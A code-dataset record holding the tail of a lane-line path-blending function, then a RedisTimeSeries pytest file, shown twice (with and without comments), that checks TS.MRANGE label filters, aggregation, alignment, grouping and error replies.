lane_path_y = (l_prob * path_from_left_lane + r_prob * path_from_right_lane) / (l_prob + r_prob + 0.0001)
safe_idxs = np.isfinite(self.ll_t)
if safe_idxs[0]:
lane_path_y_interp = np.interp(path_t, self.ll_t[safe_idxs], lane_path_y[safe_idxs])
path_xyz[:,1] = self.d_prob * lane_path_y_interp + (1.0 - self.d_prob) * path_xyz[:,1]
else:
cloudlog.warning("Lateral mpc - NaNs in laneline times, ignoring")
return path_xyz
| true
| true
|
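A small numeric sketch (invented values) of the blending math in get_d_path above: d_prob is the probabilistic OR of the two lane-line probabilities, and the lateral path is their probability-weighted average:

# Invented numbers; the formulas mirror get_d_path above.
import numpy as np

l_prob, r_prob = 0.9, 0.6
lane_width = 3.6
lll_y = np.array([-1.85, -1.84, -1.83])        # left lane line offsets, metres
rll_y = np.array([ 1.75,  1.76,  1.77])        # right lane line offsets, metres
d_prob = l_prob + r_prob - l_prob * r_prob     # 0.96: trust lanes if either line is confident
path_from_left_lane = lll_y + lane_width / 2.0
path_from_right_lane = rll_y - lane_width / 2.0
lane_path_y = (l_prob * path_from_left_lane + r_prob * path_from_right_lane) / (l_prob + r_prob + 0.0001)
print(d_prob, lane_path_y)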
1c4233a81772cebc4ed4ece2d3a93645f94d10de
| 22,510
|
py
|
Python
|
tests/flow/test_ts_mrange.py
|
rostyboost/RedisTimeSeries
|
61b9db88ec00447ecd87583b60dbf7ad9394719d
|
[
"MIT",
"Ruby",
"BSD-3-Clause"
] | null | null | null |
tests/flow/test_ts_mrange.py
|
rostyboost/RedisTimeSeries
|
61b9db88ec00447ecd87583b60dbf7ad9394719d
|
[
"MIT",
"Ruby",
"BSD-3-Clause"
] | null | null | null |
tests/flow/test_ts_mrange.py
|
rostyboost/RedisTimeSeries
|
61b9db88ec00447ecd87583b60dbf7ad9394719d
|
[
"MIT",
"Ruby",
"BSD-3-Clause"
] | null | null | null |
import pytest
import redis
import time
from collections import defaultdict
from utils import Env, set_hertz
from test_helper_classes import _insert_data
from test_ts_range import build_expected_aligned_data
from includes import *
def test_mrange_with_expire_cmd():
env = Env()
set_hertz(env)
with env.getClusterConnectionIfNeeded() as r:
assert r.execute_command("TS.ADD", "X" ,"*" ,"1" ,"LABELS", "type", "DELAYED")
assert r.execute_command("TS.ADD", "Y" ,"*" ,"1" ,"LABELS", "type", "DELAYED")
assert r.execute_command("TS.ADD", "Z" ,"*" ,"1" ,"LABELS", "type", "DELAYED")
current_ts = time.time()
assert r.execute_command("EXPIRE","X", 5)
assert r.execute_command("EXPIRE","Y", 6)
assert r.execute_command("EXPIRE","Z", 7)
while time.time() < (current_ts+10):
reply = r.execute_command('TS.mrange', '-', '+', 'FILTER', 'type=DELAYED')
assert(len(reply)>=0 and len(reply)<=3)
assert r.execute_command("PING")
def test_mrange_expire_issue549():
Env().skipOnDebugger()
env = Env()
set_hertz(env)
with Env().getClusterConnectionIfNeeded() as r:
assert r.execute_command('ts.add', 'k1', 1, 10, 'LABELS', 'l', '1') == 1
assert r.execute_command('ts.add', 'k2', 2, 20, 'LABELS', 'l', '1') == 2
assert r.execute_command('expire', 'k1', '1') == 1
for i in range(0, 5000):
assert env.getConnection().execute_command('ts.mrange - + aggregation avg 10 withlabels filter l=1') is not None
def test_range_by_labels():
start_ts = 1511885909
samples_count = 50
for mode in ["UNCOMPRESSED", "COMPRESSED"]:
env = Env()
with Env().getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', mode, 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', mode, 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', mode, 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
_insert_data(r, 'tester1', start_ts, samples_count, 5)
_insert_data(r, 'tester2', start_ts, samples_count, 15)
_insert_data(r, 'tester3', start_ts, samples_count, 25)
expected_result = [[start_ts + i, str(5).encode('ascii')] for i in range(samples_count)]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'name=bob')
assert [[b'tester1', [], expected_result]] == actual_result
expected_result.reverse()
actual_result = r.execute_command('TS.mrevrange', start_ts, start_ts + samples_count, 'FILTER', 'name=bob')
assert [[b'tester1', [], expected_result]] == actual_result
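            # helper: expected LAST-aggregated reply, one sample per time bucket aligned to multiples of time_bucket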
def build_expected(val, time_bucket):
return [[int(i - i % time_bucket), str(val).encode('ascii')] for i in
range(start_ts, start_ts + samples_count + 1, time_bucket)]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'LAST', 5,
'FILTER', 'generation=x')
expected_result = [[b'tester1', [], build_expected(5, 5)],
[b'tester2', [], build_expected(15, 5)],
[b'tester3', [], build_expected(25, 5)],
]
env.assertEqual(sorted(expected_result), sorted(actual_result))
assert expected_result[1:] == sorted(r.execute_command('TS.mrange', start_ts, start_ts + samples_count,
'AGGREGATION', 'LAST', 5, 'FILTER', 'generation=x',
'class!=middle'), key=lambda x:x[0])
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'COUNT', 3, 'AGGREGATION',
'LAST', 5, 'FILTER', 'generation=x')
assert expected_result[0][2][:3] == sorted(actual_result, key=lambda x:x[0])[0][2]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'COUNT', 5,
'FILTER', 'generation=x')
assert [[1511885905, b'1']] == actual_result[0][2][:1]
assert expected_result[0][2][1:9] == actual_result[0][2][1:9]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'COUNT', 3,
'COUNT', 3, 'FILTER', 'generation=x')
            assert 3 == len(actual_result[0][2])  # the COUNT limit still applies when given after AGGREGATION
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'COUNT', 3, 'AGGREGATION',
'COUNT', 3, 'FILTER', 'generation=x')
            assert 3 == len(actual_result[0][2])  # the COUNT limit still applies when given before AGGREGATION
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'COUNT', 3,
'FILTER', 'generation=x')
            assert 18 == len(actual_result[0][2])  # without a COUNT limit all 18 aggregation buckets are returned
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'invalid', 3,
'FILTER', 'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'AVG', 'string',
'FILTER', 'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'COUNT', 'string', 'FILTER',
'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', '-', '+' ,'FILTER') # missing args
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', '-', '+', 'RETLIF') # no filter word
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', 'string', start_ts + samples_count, 'FILTER', 'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, 'string', 'FILTER', 'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'generation+x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'generation!=x')
# issue 414
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'name=(bob,rudy,)')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'name=(bob,,rudy)')
# test SELECTED_LABELS
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'SELECTED_LABELS', 'filter', 'k!=5')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'SELECTED_LABELS', 'filter', 'k!=5')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'SELECTED_LABELS', 'WITHLABELS', 'filter', 'k!=5')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'WITHLABELS', 'SELECTED_LABELS', 'filter', 'k!=5')
env.flush()
def test_mrange_filterby():
start_ts = 1511885909
samples_count = 50
env = Env()
with env.getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
_insert_data(r, 'tester1', start_ts, samples_count, 5)
_insert_data(r, 'tester2', start_ts, samples_count, 15)
_insert_data(r, 'tester3', start_ts, samples_count, 25)
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_VALUE', "a", 1 ,'FILTER', 'name=bob')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_VALUE', "a", "a" ,'FILTER', 'name=bob')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_VALUE', 1, "a" ,'FILTER', 'name=bob')
expected_result = [[b'tester1', [], []],
[b'tester2', [], [[start_ts + i, str(15).encode('ascii')] for i in range(samples_count)]],
[b'tester3', [], []],
]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_VALUE', 10, 20,'FILTER', 'generation=x')
env.assertEqual(sorted(actual_result), sorted(expected_result))
expected_result = [[b'tester1', [], []],
[b'tester2', [], [[start_ts + i, str(15).encode('ascii')] for i in range(9, 12)]],
[b'tester3', [], []],
]
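        # only tester2's values (15) fall inside [10, 20], and FILTER_BY_TS narrows them to three timestamps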
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_TS', start_ts+9, start_ts+10, start_ts+11, 'FILTER_BY_VALUE', 10, 20,'FILTER', 'generation=x')
env.assertEqual(sorted(actual_result), sorted(expected_result))
def test_mrange_withlabels():
start_ts = 1511885909
samples_count = 50
with Env().getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
_insert_data(r, 'tester1', start_ts, samples_count, 5)
_insert_data(r, 'tester2', start_ts, samples_count, 15)
_insert_data(r, 'tester3', start_ts, samples_count, 25)
expected_result = [[start_ts + i, str(5).encode('ascii')] for i in range(samples_count)]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'WITHLABELS', 'FILTER',
'name=bob')
assert [[b'tester1', [[b'name', b'bob'], [b'class', b'middle'], [b'generation', b'x']],
expected_result]] == actual_result
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'SELECTED_LABELS', 'name', 'generation', 'FILTER',
'name=bob')
assert [[b'tester1', [[b'name', b'bob'], [b'generation', b'x']],
expected_result]] == actual_result
actual_result = r.execute_command('TS.mrange', start_ts + 1, start_ts + samples_count, 'WITHLABELS',
'AGGREGATION', 'COUNT', 1, 'FILTER', 'generation=x')
# assert the labels length is 3 (name,class,generation) for each of the returned time-series
try:
assert len(actual_result[0][1]) != 3 or len(actual_result[1][1]) != 3 or len(actual_result[2][1]) == 3
except Exception as ex:
print(str(actual_result))
res = r.execute_command('TS.INFO', 'tester1')
print(str(res))
res = r.execute_command('TS.INFO', 'tester2')
print(str(res))
res = r.execute_command('TS.INFO', 'tester3')
print(str(res))
raise ex
assert len(actual_result[0][1]) == 3
assert len(actual_result[1][1]) == 3
assert len(actual_result[2][1]) == 3
def test_multilabel_filter():
with Env().getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
assert r.execute_command('TS.ADD', 'tester1', 0, 1) == 0
assert r.execute_command('TS.ADD', 'tester2', 0, 2) == 0
assert r.execute_command('TS.ADD', 'tester3', 0, 3) == 0
actual_result = r.execute_command('TS.mrange', '-', '+', 'WITHLABELS', 'FILTER', 'name=(bob,rudy)')
assert set(item[0] for item in actual_result) == set([b'tester1', b'tester2'])
actual_result = r.execute_command('TS.mrange', 0, '+', 'WITHLABELS', 'FILTER', 'name=(bob,rudy)',
'class!=(middle,top)')
assert actual_result[0][0] == b'tester2'
actual_result = r.execute_command('TS.mget', 'WITHLABELS', 'FILTER', 'name=(bob,rudy)')
assert set(item[0] for item in actual_result) == set([b'tester1', b'tester2'])
actual_result = r.execute_command('TS.mget', 'WITHLABELS', 'FILTER', 'name=(bob,rudy)', 'class!=(middle,top)')
assert actual_result[0][0] == b'tester2'
def test_large_key_value_pairs():
with Env().getClusterConnectionIfNeeded() as r:
number_series = 100
for i in range(0,number_series):
assert r.execute_command('TS.CREATE', 'ts-{}'.format(i), 'LABELS', 'baseAsset', '17049', 'counterAsset', '840', 'source', '1000', 'dataType', 'PRICE_TICK')
kv_label1 = 'baseAsset=(13830,10249,16019,10135,17049,10777,10138,11036,11292,15778,11043,10025,11436,12207,13359,10807,12216,11833,10170,10811,12864,12738,10053,11334,12487,12619,12364,13266,11219,15827,12374,11223,10071,12249,11097,14430,13282,16226,13667,11365,12261,12646,12650,12397,12785,13941,10231,16254,12159,15103)'
kv_label2 = 'counterAsset=(840)'
kv_label3 = 'source=(1000)'
kv_label4 = 'dataType=(PRICE_TICK)'
kv_labels = [kv_label1, kv_label2, kv_label3, kv_label4]
for kv_label in kv_labels:
            res = r.execute_command('TS.MRANGE', '-', '+', 'FILTER', kv_label)
assert len(res) == number_series
def ensure_replies_series_match(env,series_array_1, series_array_2):
for ts in series_array_1:
ts_name = ts[0]
ts_labels =ts[1]
ts_values =ts[2]
for comparison_ts in series_array_2:
comparison_ts_name = comparison_ts[0]
comparison_ts_labels =comparison_ts[1]
comparison_ts_values =comparison_ts[2]
if ts_name == comparison_ts_name:
env.assertEqual(ts_labels,comparison_ts_labels)
env.assertEqual(ts_values,comparison_ts_values)
def test_non_local_data():
env = Env()
with env.getClusterConnectionIfNeeded() as r:
r.execute_command('TS.ADD', '{host1}_metric_1', 1 ,100, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_2', 2 ,40, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_1', 2, 95)
r.execute_command('TS.ADD', '{host1}_metric_1', 10, 99)
previous_results = []
# ensure that initiating the query on different shards always replies with the same series
for shard in range(0, env.shardsCount):
shard_conn = env.getConnection(shard)
actual_result = shard_conn.execute_command('TS.MRANGE - + FILTER metric=cpu')
env.assertEqual(len(actual_result),2)
for previous_result in previous_results:
ensure_replies_series_match(env,previous_result,actual_result)
previous_results.append(actual_result)
def test_non_local_filtered_data():
env = Env()
with env.getClusterConnectionIfNeeded() as r:
r.execute_command('TS.ADD', '{host1}_metric_1', 1 ,100, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_2', 2 ,40, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_1', 2, 95)
r.execute_command('TS.ADD', '{host1}_metric_1', 10, 99)
previous_results = []
# ensure that initiating the query on different shards always replies with the same series
for shard in range(0, env.shardsCount):
shard_conn = env.getConnection(shard)
            # send unordered timestamps to verify the reply is sorted by the server
actual_result = shard_conn.execute_command('TS.MRANGE - + FILTER_BY_TS 11 5 25 55 101 18 9 1900 2 FILTER metric=cpu')
env.assertEqual(len(actual_result),2)
# ensure reply is properly filtered by TS
for serie in actual_result:
serie_ts = serie[2]
# ensure only timestamp 2 is present on reply
env.assertEqual(len(serie_ts),1)
env.assertEqual(serie_ts[0][0],2)
for previous_result in previous_results:
ensure_replies_series_match(env,previous_result,actual_result)
previous_results.append(actual_result)
def test_non_local_filtered_labels():
env = Env()
with env.getClusterConnectionIfNeeded() as r:
r.execute_command('TS.ADD', '{host1}_metric_1', 1 ,100, 'LABELS', 'metric', 'cpu', '')
r.execute_command('TS.ADD', '{host1}_metric_2', 2 ,40, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_1', 2, 95)
r.execute_command('TS.ADD', '{host1}_metric_1', 10, 99)
previous_results = []
# ensure that initiating the query on different shards always replies with the same series
for shard in range(0, env.shardsCount):
shard_conn = env.getConnection(shard)
actual_result = shard_conn.execute_command('TS.MRANGE - + FILTER_BY_TS 2 SELECTED_LABELS metric FILTER metric=cpu')
env.assertEqual(len(actual_result),2)
for previous_result in previous_results:
ensure_replies_series_match(env,previous_result,actual_result)
previous_results.append(actual_result)
def test_mrange_align():
start_ts = 1511885909
samples_count = 50
with Env(decodeResponses=True).getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
_insert_data(r, 'tester1', start_ts, samples_count, 5)
_insert_data(r, 'tester2', start_ts, samples_count, 15)
_insert_data(r, 'tester3', start_ts, samples_count, 25)
end_ts = start_ts + samples_count
agg_bucket_size = 15
expected_start_result = [
['tester1', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, start_ts)],
['tester2', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, start_ts)],
['tester3', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, start_ts)],
]
expected_end_result = [
['tester1', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, end_ts)],
['tester2', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, end_ts)],
['tester3', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, end_ts)],
]
assert expected_start_result == decode_if_needed(sorted(r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'ALIGN', '-',
'AGGREGATION', 'COUNT', agg_bucket_size, 'FILTER', 'generation=x')))
assert expected_end_result == decode_if_needed(sorted(r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'ALIGN', '+',
'AGGREGATION', 'COUNT', agg_bucket_size, 'FILTER', 'generation=x')))
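        # expected shape of GROUPBY generation REDUCE max: the per-bucket maximum of the COUNT aggregation across the three series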
def groupby(data):
result = defaultdict(lambda: 0)
for key, labels, samples in data:
for sample in samples:
result[sample[0]] = max(result[sample[0]], int(sample[1]))
return [[s[0], str(s[1])] for s in result.items()]
expected_groupby_start_result = [['generation=x', [], groupby(expected_start_result)]]
expected_groupby_end_result = [['generation=x', [], groupby(expected_end_result)]]
assert expected_groupby_start_result == decode_if_needed(r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'ALIGN', '-', 'AGGREGATION',
'COUNT', agg_bucket_size, 'FILTER', 'generation=x',
'GROUPBY', 'generation', 'REDUCE', 'max'))
assert expected_groupby_end_result == decode_if_needed(r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'ALIGN', '+', 'AGGREGATION',
'COUNT', agg_bucket_size, 'FILTER', 'generation=x',
'GROUPBY', 'generation', 'REDUCE', 'max'))
| 61.00271
| 333
| 0.609329
|
import pytest
import redis
import time
from collections import defaultdict
from utils import Env, set_hertz
from test_helper_classes import _insert_data
from test_ts_range import build_expected_aligned_data
from includes import *
def test_mrange_with_expire_cmd():
env = Env()
set_hertz(env)
with env.getClusterConnectionIfNeeded() as r:
assert r.execute_command("TS.ADD", "X" ,"*" ,"1" ,"LABELS", "type", "DELAYED")
assert r.execute_command("TS.ADD", "Y" ,"*" ,"1" ,"LABELS", "type", "DELAYED")
assert r.execute_command("TS.ADD", "Z" ,"*" ,"1" ,"LABELS", "type", "DELAYED")
current_ts = time.time()
assert r.execute_command("EXPIRE","X", 5)
assert r.execute_command("EXPIRE","Y", 6)
assert r.execute_command("EXPIRE","Z", 7)
while time.time() < (current_ts+10):
reply = r.execute_command('TS.mrange', '-', '+', 'FILTER', 'type=DELAYED')
            assert 0 <= len(reply) <= 3
assert r.execute_command("PING")
def test_mrange_expire_issue549():
Env().skipOnDebugger()
env = Env()
set_hertz(env)
with Env().getClusterConnectionIfNeeded() as r:
assert r.execute_command('ts.add', 'k1', 1, 10, 'LABELS', 'l', '1') == 1
assert r.execute_command('ts.add', 'k2', 2, 20, 'LABELS', 'l', '1') == 2
assert r.execute_command('expire', 'k1', '1') == 1
for i in range(0, 5000):
assert env.getConnection().execute_command('ts.mrange - + aggregation avg 10 withlabels filter l=1') is not None
def test_range_by_labels():
start_ts = 1511885909
samples_count = 50
for mode in ["UNCOMPRESSED", "COMPRESSED"]:
env = Env()
with Env().getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', mode, 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', mode, 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', mode, 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
_insert_data(r, 'tester1', start_ts, samples_count, 5)
_insert_data(r, 'tester2', start_ts, samples_count, 15)
_insert_data(r, 'tester3', start_ts, samples_count, 25)
expected_result = [[start_ts + i, str(5).encode('ascii')] for i in range(samples_count)]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'name=bob')
assert [[b'tester1', [], expected_result]] == actual_result
expected_result.reverse()
actual_result = r.execute_command('TS.mrevrange', start_ts, start_ts + samples_count, 'FILTER', 'name=bob')
assert [[b'tester1', [], expected_result]] == actual_result
def build_expected(val, time_bucket):
return [[int(i - i % time_bucket), str(val).encode('ascii')] for i in
range(start_ts, start_ts + samples_count + 1, time_bucket)]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'LAST', 5,
'FILTER', 'generation=x')
expected_result = [[b'tester1', [], build_expected(5, 5)],
[b'tester2', [], build_expected(15, 5)],
[b'tester3', [], build_expected(25, 5)],
]
env.assertEqual(sorted(expected_result), sorted(actual_result))
assert expected_result[1:] == sorted(r.execute_command('TS.mrange', start_ts, start_ts + samples_count,
'AGGREGATION', 'LAST', 5, 'FILTER', 'generation=x',
'class!=middle'), key=lambda x:x[0])
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'COUNT', 3, 'AGGREGATION',
'LAST', 5, 'FILTER', 'generation=x')
assert expected_result[0][2][:3] == sorted(actual_result, key=lambda x:x[0])[0][2]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'COUNT', 5,
'FILTER', 'generation=x')
assert [[1511885905, b'1']] == actual_result[0][2][:1]
assert expected_result[0][2][1:9] == actual_result[0][2][1:9]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'COUNT', 3,
'COUNT', 3, 'FILTER', 'generation=x')
assert 3 == len(actual_result[0][2])
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'COUNT', 3, 'AGGREGATION',
'COUNT', 3, 'FILTER', 'generation=x')
assert 3 == len(actual_result[0][2])
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'COUNT', 3,
'FILTER', 'generation=x')
assert 18 == len(actual_result[0][2])
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'invalid', 3,
'FILTER', 'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'AGGREGATION', 'AVG', 'string',
'FILTER', 'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'COUNT', 'string', 'FILTER',
'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', '-', '+' ,'FILTER')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', '-', '+', 'RETLIF')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', 'string', start_ts + samples_count, 'FILTER', 'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, 'string', 'FILTER', 'generation=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'generation+x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'generation!=x')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'name=(bob,rudy,)')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER', 'name=(bob,,rudy)')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'SELECTED_LABELS', 'filter', 'k!=5')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'SELECTED_LABELS', 'filter', 'k!=5')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'SELECTED_LABELS', 'WITHLABELS', 'filter', 'k!=5')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'WITHLABELS', 'SELECTED_LABELS', 'filter', 'k!=5')
env.flush()
def test_mrange_filterby():
start_ts = 1511885909
samples_count = 50
env = Env()
with env.getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
_insert_data(r, 'tester1', start_ts, samples_count, 5)
_insert_data(r, 'tester2', start_ts, samples_count, 15)
_insert_data(r, 'tester3', start_ts, samples_count, 25)
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_VALUE', "a", 1 ,'FILTER', 'name=bob')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_VALUE', "a", "a" ,'FILTER', 'name=bob')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_VALUE', 1, "a" ,'FILTER', 'name=bob')
expected_result = [[b'tester1', [], []],
[b'tester2', [], [[start_ts + i, str(15).encode('ascii')] for i in range(samples_count)]],
[b'tester3', [], []],
]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_VALUE', 10, 20,'FILTER', 'generation=x')
env.assertEqual(sorted(actual_result), sorted(expected_result))
expected_result = [[b'tester1', [], []],
[b'tester2', [], [[start_ts + i, str(15).encode('ascii')] for i in range(9, 12)]],
[b'tester3', [], []],
]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_TS', start_ts+9, start_ts+10, start_ts+11, 'FILTER_BY_VALUE', 10, 20,'FILTER', 'generation=x')
env.assertEqual(sorted(actual_result), sorted(expected_result))
def test_mrange_withlabels():
start_ts = 1511885909
samples_count = 50
with Env().getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
_insert_data(r, 'tester1', start_ts, samples_count, 5)
_insert_data(r, 'tester2', start_ts, samples_count, 15)
_insert_data(r, 'tester3', start_ts, samples_count, 25)
expected_result = [[start_ts + i, str(5).encode('ascii')] for i in range(samples_count)]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'WITHLABELS', 'FILTER',
'name=bob')
assert [[b'tester1', [[b'name', b'bob'], [b'class', b'middle'], [b'generation', b'x']],
expected_result]] == actual_result
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'SELECTED_LABELS', 'name', 'generation', 'FILTER',
'name=bob')
